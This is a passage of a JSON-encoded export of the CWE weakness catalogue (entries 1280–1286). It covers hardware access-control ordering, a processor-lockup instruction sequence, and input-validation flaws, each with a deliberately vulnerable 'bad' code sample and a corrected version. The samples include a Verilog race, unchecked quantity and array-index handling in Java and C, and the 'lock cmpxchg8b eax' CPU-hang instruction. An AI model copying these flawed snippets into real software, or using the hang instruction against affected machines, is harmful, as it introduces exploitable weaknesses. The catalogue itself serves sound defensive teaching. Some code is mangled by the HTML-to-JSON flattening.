Self-Test","attr":{"@_Date":"2020-08-20"}}}},"1280":{"attr":{"@_ID":"1280","@_Name":"Access Control Check Implemented After Asset is Accessed","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A product\'s hardware-based access control check occurs after the asset has been accessed.","Extended_Description":{"xhtml:p":"The product implements a hardware-based access control check. The asset should be accessible only after the check is successful. If, however, this operation is not atomic and the asset is accessed before the check is complete, the security of the system may be compromised."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"696","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Confidentiality","Integrity"],"Impact":["Modify Memory","Read Memory","Modify Application Data","Read Application Data","Gain Privileges or Assume Identity","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Implement the access control check first. Access should only be given to asset if agent is authorized."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Assume that the module foo_bar implements a protected register. The register content is the asset. Only transactions made by user id (indicated by signal usr_id) 0x4 are allowed to modify the register contents. The signal grant_access is used to provide access.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Verilog"},"xhtml:div":{"#text":"module foo_bar(data_out, usr_id, data_in, clk, rst_n);endmodule","xhtml:p":["output reg [7:0] data_out;;","input wire [2:0] usr_id;","input wire [7:0] data_in;","input wire clk, rst_n;","wire grant_access;","always @ (posedge clk or negedge rst_n)","begin"],"xhtml:div":{"#text":"if (!rst_n)elseend","attr":{"@_style":"margin-left:10px"},"xhtml:br":"","xhtml:div":[{"#text":"data_out = 0;","attr":{"@_style":"margin-left:10px"}},{"#text":"data_out = (grant_access) ? data_in : data_out;assign grant_access = (usr_id == 3\u2019h4) ? 1\u2019b1 : 1\u2019b0;","attr":{"@_style":"margin-left:10px"},"xhtml:br":""}]}}},{"attr":{"@_Nature":"good","@_Language":"Verilog"},"xhtml:p":"Flipping the order of the assignment of data_out and grant_access should solve the problem. The correct snippet of code is shown below.","xhtml:div":["always @ (posedge clk or negedge rst_n)","begin",{"#text":"if (!rst_n)elseend","attr":{"@_style":"margin-left:10px"},"xhtml:div":[{"#text":"data_out = 0;","attr":{"@_style":"margin-left:10px"}},{"#text":"assign grant_access = (usr_id == 3\u2019h4) ? 1\u2019b1 : 1\u2019b0;data_out = (grant_access) ? data_in : data_out;","attr":{"@_style":"margin-left:10px"},"xhtml:br":""}]},"endmodule"]}],"Body_Text":"This code uses Verilog blocking assignments for data_out and grant_access. Therefore, these assignments happen sequentially (i.e., data_out is updated to new value first, and grant_access is updated the next cycle) and not in parallel. Therefore, the asset data_out is allowed to be modified even before the access control check is complete and grant_access signal is set. Since grant_access does not have a reset value, it will be meta-stable and will randomly go to either 0 or 1."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"180"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-12"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Related_Attack_Patterns"}}},"1281":{"attr":{"@_ID":"1281","@_Name":"Sequence of Processor Instructions Leads to Unexpected Behavior","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Specific combinations of processor instructions lead to undesirable behavior such as locking the processor until a hard reset performed.","Extended_Description":{"xhtml:p":["If the instruction set architecture (ISA) and processor logic are not designed carefully, and tested thoroughly, certain combinations of instructions may lead to locking the processor or other unexpected and undesirable behavior.  Upon encountering unimplemented instruction opcodes or illegal instruction operands the processor should throw an exception and carry on without negatively impacting security.  However, specific combinations of legal and illegal instructions may cause unexpected behavior with security implications such as allowing unprivileged programs to completely lock the CPU.","Some examples are the Pentium f00f bug, MC6800 HCF, the Cyrix comma bug, and more generally other \\"Halt and Catch Fire\\" instructions."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Unexpected behavior from certain instruction combinations can arise from bugs in the ISA"},{"Phase":"Implementation","Note":"Unexpected behavior from certain instruction combinations can arise because of implementation details such as speculative execution, caching etc."}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability"],"Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Testing","Description":"Implement a rigorous testing strategy that incorporates randomization to explore instruction sequences that are unlikely to appear in normal workloads in order to identify halt and catch fire instruction sequences."},{"Phase":"Patching and Maintenance","Description":"Patch operating system to avoid running Halt and Catch Fire type sequences or to mitigate the damage caused by unexpected behavior.  See [REF-1108]."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The Pentium F00F bug is a real-world example of how a sequence of instructions can lock a processor. The \u201ccmpxchg8b\u201d instruction compares contents of registers with a memory location.  The operand is expected to be a memory location, but in the bad code snippet it is the eax register. Because the specified operand is illegal, an exception is generated, which is the correct behavior and not a security issue in itself. However, when prefixed with the \u201clock\u201d instruction, the processor deadlocks because locked memory transactions require a read and write pair of transactions to occur before the lock on the memory bus is released. The exception causes a read to occur but there is no corresponding write, as there would have been if a legal operand had been supplied to the cmpxchg8b instruction.","Example_Code":{"#text":"lock cmpxchg8b eax","attr":{"@_Nature":"bad","@_Language":"Other"}}}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-1999-1476","Description":"A bug in some Intel Pentium processors allow DoS (hang) via an invalid \\"CMPXCHG8B\\" instruction, causing a deadlock","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1476"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"212"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1094"}},{"attr":{"@_External_Reference_ID":"REF-1108"}}]},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-05-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Name, Observed_Examples"}],"Previous_Entry_Name":{"#text":"Sequence of Processor Instructions Leads to Unexpected Behavior (Halt and Catch Fire)","attr":{"@_Date":"2021-07-20"}}}},"1282":{"attr":{"@_ID":"1282","@_Name":"Assumed-Immutable Data is Stored in Writable Memory","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Immutable data, such as a first-stage bootloader, device identifiers, and \\"write-once\\" configuration settings are stored in writable memory that can be re-programmed or updated in the field.","Extended_Description":{"xhtml:p":"Security services such as secure boot, authentication of code and data, and device attestation all require assets such as the first stage bootloader, public keys, golden hash digests, etc. which are implicitly trusted. Storing these assets in read-only memory (ROM), fuses, or one-time programmable (OTP) memory provides strong integrity guarantees and provides a root of trust for securing the rest of the system. Security is lost if assets assumed to be immutable can be modified."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"471","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"Keys, code, configuration settings, and other data should be programmed in write-once or read-only memory instead of writable memory."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"All immutable code or data should be programmed into ROM or write-once memory."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Cryptographic hash functions are commonly used to create unique fixed-length digests used to ensure the integrity of code and keys. A golden digest is stored on the device and compared to the digest computed from the data to be verified. If the digests match, the data has not been maliciously modified. If an attacker can modify the golden digest they then have the ability to store arbitrary data that passes the verification check. Hash digests used to verify public keys and early stage boot code should be immutable, with the strongest protection offered by hardware immutability."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"Notes":{"Note":[{"#text":"This entry is still under development and will continue to\\n          see updates and content improvements.","attr":{"@_Type":"Maintenance"}},{"#text":"As of CWE 4.3, CWE-1282 and CWE-1233 are being investigated\\n\\t\\t  for potential duplication or overlap.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-05-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Modes_of_Introduction, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Assumed-Immutable Data Stored in Writable Memory","attr":{"@_Date":"2020-08-20"}}}},"1283":{"attr":{"@_ID":"1283","@_Name":"Mutable Attestation or Measurement Reporting Data","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The register contents used for attestation or measurement reporting data to verify boot flow are modifiable by an adversary.","Extended_Description":{"xhtml:p":"A System-on-Chip (SoC) implements secure boot or verified boot. During this boot flow, the SoC often measures the code that it authenticates. The measurement is usually done by calculating the one-way hash of the code binary and extending it to the previous hash. The hashing algorithm should be a Secure One-Way hash function. The final hash, i.e., the value obtained after the completion of the boot flow, serves as the measurement data used in reporting or in attestation. The calculated hash is often stored in registers that can later be read by the party of interest to determine tampering of the boot flow. A common weakness is that the contents in these registers are modifiable by an adversary, thus spoofing the measurement."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Such issues can be introduced during hardware architecture or design and can be identified later during Testing or System Configuration phases."},{"Phase":"Implementation","Note":"If the access-controls which protecting the reporting registers are misconfigured during implementation, this weakness can arise."}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Memory","Read Application Data"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:p":"Measurement data should be stored in registers that are read-only or otherwise have access controls that prevent modification by an untrusted agent."}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The SoC extends the hash and stores the results in registers. Without protection, an adversary can write their chosen hash values to these registers. Thus, the attacker controls the reported results.","Body_Text":{"xhtml:p":"To prevent the above scenario, the registers should have one or more of the following properties:","xhtml:ol":{"xhtml:li":["Should be Read-Only with respect to an adversary","Cannot be extended or modifiable either directly or indirectly (using a trusted agent as proxy) by an adversary","Should have appropriate access controls or protections"]}}}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"1"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1107"}},{"attr":{"@_External_Reference_ID":"REF-1131"}}]},"Notes":{"Note":{"#text":"This entry is still in development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-04-25"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated References, Related_Attack_Patterns"}}},"1284":{"attr":{"@_ID":"1284","@_Name":"Improper Validation of Specified Quantity in Input","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product receives input that is expected to specify a quantity (such as size or length), but it does not validate or incorrectly validates that the quantity has the required properties.","Extended_Description":{"xhtml:p":"Specified quantities include size, length, frequency, price, rate, number of operations, time, and others. Code may rely on specified quantities to allocate resources, perform calculations, control iteration, etc. When the quantity is not properly validated, then attackers can specify malicious quantities to cause excessive resource allocation, trigger unexpected failures, enable buffer overflows, etc."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context","Note":"Since quantities are used so often to affect resource allocation or process financial data, they are often present in many places in the code."}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]},"Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-135"},"Intro_Text":"This example demonstrates a shopping interaction in which the user is free to specify the quantity of items to be purchased and a total is calculated.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...public static final double price = 20.00;int quantity = currentUser.getAttribute(\\"quantity\\");double total = price * quantity;chargeUser(total);...","xhtml:br":["","","","",""]}},"Body_Text":"The user has no control over the price variable, however the code does not prevent a negative value from being specified for quantity. If an attacker were to provide a negative value, then the user would have their account credited instead of debited."},{"attr":{"@_Demonstrative_Example_ID":"DX-136"},"Intro_Text":"This example asks the user for a height and width of an m X n game board with a maximum dimension of 100 squares.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"...#define MAX_DIM 100...int m,n, error;board_square_t *board;printf(\\"Please specify the board height: \\\\n\\");error = scanf(\\"%d\\", &amp;m);if ( EOF == error ){}printf(\\"Please specify the board width: \\\\n\\");error = scanf(\\"%d\\", &amp;n);if ( EOF == error ){}if ( m &gt; MAX_DIM || n &gt; MAX_DIM ) {}board = (board_square_t*) malloc( m * n * sizeof(board_square_t));...","xhtml:br":["","","","","","","","","","","","","","",""],"xhtml:i":"/* board dimensions */","xhtml:div":[{"#text":"die(\\"No integer passed: Die evil hacker!\\\\n\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"die(\\"No integer passed: Die evil hacker!\\\\n\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"die(\\"Value too large: Die evil hacker!\\\\n\\");","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"While this code checks to make sure the user cannot specify large, positive integers and consume too much memory, it does not check for negative values supplied by the user. As a result, an attacker can perform a resource consumption (CWE-400) attack against this program by specifying two, large negative values that will not overflow, resulting in a very large memory allocation (CWE-789) and possibly a system crash. Alternatively, an attacker can provide very large negative values which will cause an integer overflow (CWE-190) and unexpected behavior will follow depending on how the values are treated in the remainder of the program."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-1440","Description":"lack of validation of length field leads to infinite loop","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1440"},{"Reference":"CVE-2008-2374","Description":"lack of validation of string length fields allows memory consumption or buffer over-read","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2374"}]},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-06-24"}}},"1285":{"attr":{"@_ID":"1285","@_Name":"Improper Validation of Specified Index, Position, or Offset in Input","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product receives input that is expected to specify an index, position, or offset into an indexable resource such as a buffer or file, but it does not validate or incorrectly validates that the specified index/position/offset has the required properties.","Extended_Description":{"xhtml:p":"Often, indexable resources such as memory buffers or files can be accessed using a specific position, index, or offset, such as an index for an array or a position for a file.  When untrusted input is not properly validated before it is used as an index, attackers could access (or attempt to access) unauthorized portions of these resources.  This could be used to cause buffer overflows, excessive resource allocation, or trigger unexpected failures."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]},"Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-134"},"Intro_Text":"The following example retrieves the sizes of messages for a pop3 mail server. The message sizes are retrieved from a socket that returns in a buffer the message number and the message size, the message number (num) and size (size) are extracted from the buffer and the message size is placed into an array using the message number for the array index.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int getsizes(int sock, int count, int *sizes) {}","xhtml:br":["",""],"xhtml:i":"/* capture the sizes of all messages */","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...char buf[BUFFER_SIZE];int ok;int num, size;while ((ok = gen_recv(sock, buf, sizeof(buf))) == 0){}","xhtml:br":["","","","","","",""],"xhtml:i":"// read values from socket and added to sizes array","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (DOTLINE(buf))else if (sscanf(buf, \\"%d %d\\", &amp;num, &amp;size) == 2)","xhtml:br":["","",""],"xhtml:i":"// continue read from socket until buf only contains \'.\'","xhtml:div":[{"#text":"break;","attr":{"@_style":"margin-left:10px;"}},{"#text":"sizes[num - 1] = size;","attr":{"@_style":"margin-left:10px;"}}]}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"int getsizes(int sock, int count, int *sizes) {}","xhtml:br":["",""],"xhtml:i":"/* capture the sizes of all messages */","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...char buf[BUFFER_SIZE];int ok;int num, size;while ((ok = gen_recv(sock, buf, sizeof(buf))) == 0){}","xhtml:br":["","","","","","",""],"xhtml:i":"// read values from socket and added to sizes array","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (DOTLINE(buf))else if (sscanf(buf, \\"%d %d\\", &amp;num, &amp;size) == 2) {}","xhtml:br":["","",""],"xhtml:i":"// continue read from socket until buf only contains \'.\'","xhtml:div":[{"#text":"break;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (num &gt; 0 &amp;&amp; num &lt;= (unsigned)count)else","xhtml:div":[{"#text":"sizes[num - 1] = size;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"report(stderr, \\"Warning: ignoring bogus data for message sizes returned by server.\\\\n\\");","xhtml:br":["",""],"xhtml:i":"/* warn about possible attempt to induce buffer overflow */"}}],"xhtml:br":""}}]}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}}],"Body_Text":"In this example the message number retrieved from the buffer could be a value that is outside the allowable range of indices for the array and could possibly be a negative number. Without proper validation of the value to be used for the array index an array overflow could occur and could potentially lead to unauthorized access to memory addresses and system crashes. The value of the array index should be validated to ensure that it is within the allowable range of indices for the array as in the following code."},{"attr":{"@_Demonstrative_Example_ID":"DX-133"},"Intro_Text":"In the following example the method displayProductSummary is called from a Web service servlet to retrieve product summary information for display to the user. The servlet obtains the integer value of the product number from the user and passes it to the displayProductSummary method. The displayProductSummary method passes the integer value of the product number to the getProductSummary method which obtains the product summary from the array object containing the project summaries using the integer value of the product number as the array index.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public String displayProductSummary(int index) {}public String getProductSummary(int index) {}","xhtml:br":["","","","",""],"xhtml:i":"// Method called from servlet to obtain product information","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String productSummary = new String(\\"\\");try {} catch (Exception ex) {...}return productSummary;","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"String productSummary = getProductSummary(index);","attr":{"@_style":"margin-left:10px;"}}}},{"#text":"return products[index];","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public String displayProductSummary(int index) {}public String getProductSummary(int index) {}","xhtml:br":["","","","",""],"xhtml:i":"// Method called from servlet to obtain product information","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String productSummary = new String(\\"\\");try {} catch (Exception ex) {...}return productSummary;","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"String productSummary = getProductSummary(index);","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String productSummary = \\"\\";if ((index &gt;= 0) &amp;&amp; (index &lt; MAX_PRODUCTS)) {}else {}return productSummary;","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"productSummary = products[index];","attr":{"@_style":"margin-left:10px;"}},{"#text":"System.err.println(\\"index is out of bounds\\");throw new IndexOutOfBoundsException();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}]}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"ArrayList productArray = new ArrayList(MAX_PRODUCTS);...try {} catch (IndexOutOfBoundsException ex) {...}","xhtml:br":["",""],"xhtml:div":{"#text":"productSummary = (String) productArray.get(index);","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":["In this example the integer value used as the array index that is provided by the user may be outside the allowable range of indices for the array which may provide unexpected results or cause the application to fail. The integer value used for the array index should be validated to ensure that it is within the allowable range of indices for the array as in the following code.","An alternative in Java would be to use one of the collection objects such as ArrayList that will automatically generate an exception if an attempt is made to access an array index that is out of bounds."]},{"attr":{"@_Demonstrative_Example_ID":"DX-90"},"Intro_Text":"The following example asks a user for an offset into an array to select an item.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int main (int argc, char **argv) {}","xhtml:br":"","xhtml:div":{"#text":"char *items[] = {\\"boat\\", \\"car\\", \\"truck\\", \\"train\\"};int index = GetUntrustedOffset();printf(\\"User selected %s\\\\n\\", items[index-1]);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"The programmer allows the user to specify which element in the list to select, however an attacker can provide an out-of-bounds offset, resulting in a buffer over-read (CWE-126)."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-0369","Description":"large ID in packet used as array index","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0369"},{"Reference":"CVE-2001-1009","Description":"negative array index as argument to POP LIST command","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1009"}]},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-06-24"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}}},"1286":{"attr":{"@_ID":"1286","@_Name":"Improper Validation of Syntactic Correctness of Input","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product receives input that is expected to be well-formed - i.e., to comply with a certain syntax - but it does not validate or incorrectly validates that the input complies with the syntax.","Extended_Description":{"xhtml:p":"Often, complex inputs are expected to follow a particular syntax, which is either assumed by the input itself, or declared within metadata such as headers. The syntax could be for data exchange formats, markup languages, or even programming languages.  When untrusted input is not properly validated for the expected syntax, attackers could cause parsing failures, trigger unexpected errors, or expose latent vulnerabilities that might not be directly exploitable if the input had conformed to the syntax."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]},"Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code loads and parses an XML file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {} catch(Exception ex) {}","xhtml:br":["",""],"xhtml:i":"// Read DOM","xhtml:div":[{"#text":"...DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();factory.setValidating( false );....c_dom = factory.newDocumentBuilder().parse( xmlFile );","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"The XML file is 